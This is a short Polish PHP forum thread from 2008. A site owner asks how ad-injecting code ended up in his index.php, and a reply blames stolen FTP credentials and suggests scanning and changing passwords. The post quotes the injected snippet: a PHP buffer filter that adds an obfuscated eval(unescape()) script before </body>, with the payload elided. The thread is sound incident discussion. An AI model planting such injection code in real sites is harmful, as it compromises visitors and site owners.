Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: wlamanie ?
Forum PHP.pl > Forum > PHP
spidero
10.07.2008, 14:39:59
Witajcie

Od kilku dni na jednej z moich stron zaczely sie pojawiac reklamy kasyna, po dlugin sledzctwie w index.php na koncu byl dodany kod podmieniajacy stopke

<?php function phpfake($buffer)

{
$Exp='<script

language="javascript">
[...]
eval(unescape($));document.write($);</sc

ript>';
return (ereg_replace("</body>", "$Exp</body>", $buffer));
}
?>

usunalem i nie ma reklam.

Ale problem pozostaje. W jaki sposob moglo sie to tam znalesc ? pliki nie sa edytowane z poziomu www, wlamanie na serwer czy moze przez php ? spotkaliscie sie kiedys z czym takim ?

Adres strony: http://husariaszczecin.pl
Wlamanie przez komentarze ?
webdice
10.07.2008, 14:42:27
Proszę o dodanie bbcode.
l0ud
10.07.2008, 14:56:18
Jest to prawdopodobnie włamanie na serwer poprzez FTP z hasłem ściągniętym z Twojego zainfekowanego komputera lub innego, w którym uzyskiwałeś dostęp poprzez FTP do strony.

- Przeskanuj swój komputer i inne komputery które uzyskiwały dostęp do strony przez FTP
- Zmień hasło do FTP

Ktoś miał podobny problem, przeczytaj:
http://blog.brodowski.net.pl/2008/04/14/go...pieczna-strona/
spidero
10.07.2008, 14:59:20
dzieki piekne, to samo zasugerowal operator z home.pl, niestety dostep do ftp ma kilka osob i nie moge miec na nimi pieczy.
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.